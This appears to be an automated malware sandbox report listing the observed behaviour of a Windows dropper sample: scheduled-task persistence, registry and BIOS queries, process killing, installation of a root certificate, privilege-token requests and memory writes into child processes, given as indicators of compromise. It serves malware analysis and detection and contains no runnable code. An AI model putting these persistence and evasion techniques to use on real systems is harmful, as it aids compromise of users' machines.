Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4032 schtasks.exe
4720 schtasks.exe
4848 schtasks.exe
4136 schtasks.exe
4784 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

4260 timeout.exe
680 timeout.exe
4788 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

1300 tasklist.exe
1616 tasklist.exe

pid	process
4032	schtasks.exe
4720	schtasks.exe
4848	schtasks.exe
4136	schtasks.exe
4784	schtasks.exe

pid	process
4260	timeout.exe
680	timeout.exe
4788	timeout.exe

pid	process
1300	tasklist.exe
1616	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2484 taskkill.exe
4212 taskkill.exe
3172 taskkill.exe
2164 taskkill.exe

pid	process
2484	taskkill.exe
4212	taskkill.exe
3172	taskkill.exe
2164	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	Info.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

XZgF1kubuwTPgORKbwIWc8XF.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	XZgF1kubuwTPgORKbwIWc8XF.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	XZgF1kubuwTPgORKbwIWc8XF.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	XZgF1kubuwTPgORKbwIWc8XF.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
3552	pub2.exe
3552	pub2.exe
2100	jfiag3g_gg.exe
2100	jfiag3g_gg.exe
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2880
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

pub2.exeZtfglzprim.exe

pid process

3552 pub2.exe
1744 Ztfglzprim.exe

pid	process
2880

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exe

description	pid	process
Token: SeDebugPrivilege	2376	SoCleanInst.exe
Token: SeCreateTokenPrivilege	1292	Install.exe
Token: SeAssignPrimaryTokenPrivilege	1292	Install.exe
Token: SeLockMemoryPrivilege	1292	Install.exe
Token: SeIncreaseQuotaPrivilege	1292	Install.exe
Token: SeMachineAccountPrivilege	1292	Install.exe
Token: SeTcbPrivilege	1292	Install.exe
Token: SeSecurityPrivilege	1292	Install.exe
Token: SeTakeOwnershipPrivilege	1292	Install.exe
Token: SeLoadDriverPrivilege	1292	Install.exe
Token: SeSystemProfilePrivilege	1292	Install.exe
Token: SeSystemtimePrivilege	1292	Install.exe
Token: SeProfSingleProcessPrivilege	1292	Install.exe
Token: SeIncBasePriorityPrivilege	1292	Install.exe
Token: SeCreatePagefilePrivilege	1292	Install.exe
Token: SeCreatePermanentPrivilege	1292	Install.exe
Token: SeBackupPrivilege	1292	Install.exe
Token: SeRestorePrivilege	1292	Install.exe
Token: SeShutdownPrivilege	1292	Install.exe
Token: SeDebugPrivilege	1292	Install.exe
Token: SeAuditPrivilege	1292	Install.exe
Token: SeSystemEnvironmentPrivilege	1292	Install.exe
Token: SeChangeNotifyPrivilege	1292	Install.exe
Token: SeRemoteShutdownPrivilege	1292	Install.exe
Token: SeUndockPrivilege	1292	Install.exe
Token: SeSyncAgentPrivilege	1292	Install.exe
Token: SeEnableDelegationPrivilege	1292	Install.exe
Token: SeManageVolumePrivilege	1292	Install.exe
Token: SeImpersonatePrivilege	1292	Install.exe
Token: SeCreateGlobalPrivilege	1292	Install.exe
Token: 31	1292	Install.exe
Token: 32	1292	Install.exe
Token: 33	1292	Install.exe
Token: 34	1292	Install.exe
Token: 35	1292	Install.exe
Token: SeDebugPrivilege	2484	taskkill.exe
Token: SeManageVolumePrivilege	3468	md9_1sjm.exe
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeManageVolumePrivilege	3468	md9_1sjm.exe
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880

Suspicious use of FindShellTrayWindow 15 IoCs

Processes:

Sta.exe.pif

pid process

4168 Sta.exe.pif
2880
2880
4168 Sta.exe.pif
4168 Sta.exe.pif
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Sta.exe.pif

pid process

4168 Sta.exe.pif
4168 Sta.exe.pif
4168 Sta.exe.pif

pid	process
4168	Sta.exe.pif
2880
2880
4168	Sta.exe.pif
4168	Sta.exe.pif
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880

pid	process
4168	Sta.exe.pif
4168	Sta.exe.pif
4168	Sta.exe.pif

Suspicious use of SetWindowsHookEx 29 IoCs

Processes:

XZgF1kubuwTPgORKbwIWc8XF.exe9ey2mXouwzaXLg9RlD5o3jbo.exexcoJgJ3jOwvOCYaZ9aHe2a_S.exeNIRcHNTRudugx7nWthADgbVt.exe50O8cmP5d_ZXcqw1zH_vtZEp.exet5xN8B6ioDdfpRJf6isCyntE.exekw4MySvRV6v7vRzbdqtN4Srw.exeeh1l25nRy0rFGrLRC3H466bT.exeQjIdtMD1evPtZva6j3tHAkvA.exereg.exe9a2Ng614z6bhLGCrzLYAfNAQ.exeWerFault.exeBg8dhj9h9WN9iL5rxRrqPg3T.exeE_NWOTcfVYLaV_wZ5zpEF9UT.exeWerFault.exeXV0pxvfNqW38gHNH_S2xxNxI.exeLT4tmxErVD5_zzxX9XB9YITt.exeInstall.exeAppLaunch.exeAppLaunch.exeAppLaunch.exeNIRcHNTRudugx7nWthADgbVt.exeAppLaunch.exeAppLaunch.exeAppLaunch.exeInstall.exeemhfdsnc.exeSta.exe.pifSta.exe.pif

pid	process
2228	XZgF1kubuwTPgORKbwIWc8XF.exe
1908	9ey2mXouwzaXLg9RlD5o3jbo.exe
3696	xcoJgJ3jOwvOCYaZ9aHe2a_S.exe
4628	NIRcHNTRudugx7nWthADgbVt.exe
4876	50O8cmP5d_ZXcqw1zH_vtZEp.exe
4852	t5xN8B6ioDdfpRJf6isCyntE.exe
3988	kw4MySvRV6v7vRzbdqtN4Srw.exe
4836	eh1l25nRy0rFGrLRC3H466bT.exe
4048	QjIdtMD1evPtZva6j3tHAkvA.exe
2120	reg.exe
3828	9a2Ng614z6bhLGCrzLYAfNAQ.exe
4596	WerFault.exe
956	Bg8dhj9h9WN9iL5rxRrqPg3T.exe
1772	E_NWOTcfVYLaV_wZ5zpEF9UT.exe
4540	WerFault.exe
1032	XV0pxvfNqW38gHNH_S2xxNxI.exe
1512	LT4tmxErVD5_zzxX9XB9YITt.exe
4576	Install.exe
4756	AppLaunch.exe
3368	AppLaunch.exe
4956	AppLaunch.exe
5108	NIRcHNTRudugx7nWthADgbVt.exe
3496	AppLaunch.exe
2560	AppLaunch.exe
3256	AppLaunch.exe
2364	Install.exe
2568	emhfdsnc.exe
4168	Sta.exe.pif
1912	Sta.exe.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exeFiles.exeFolder.exeInstall.execmd.exerUNdlL32.eXesvchost.exeInfo.execmd.exeFile.exe

description	pid	process	target process
PID 1652 wrote to memory of 2376	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	SoCleanInst.exe
PID 1652 wrote to memory of 2376	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	SoCleanInst.exe
PID 1652 wrote to memory of 3468	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	md9_1sjm.exe
PID 1652 wrote to memory of 3468	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	md9_1sjm.exe
PID 1652 wrote to memory of 3468	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	md9_1sjm.exe
PID 1652 wrote to memory of 3428	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Folder.exe
PID 1652 wrote to memory of 3428	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Folder.exe
PID 1652 wrote to memory of 3428	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Folder.exe
PID 1652 wrote to memory of 4188	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Info.exe
PID 1652 wrote to memory of 4188	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Info.exe
PID 1652 wrote to memory of 4188	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Info.exe
PID 1652 wrote to memory of 4284	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Updbdate.exe
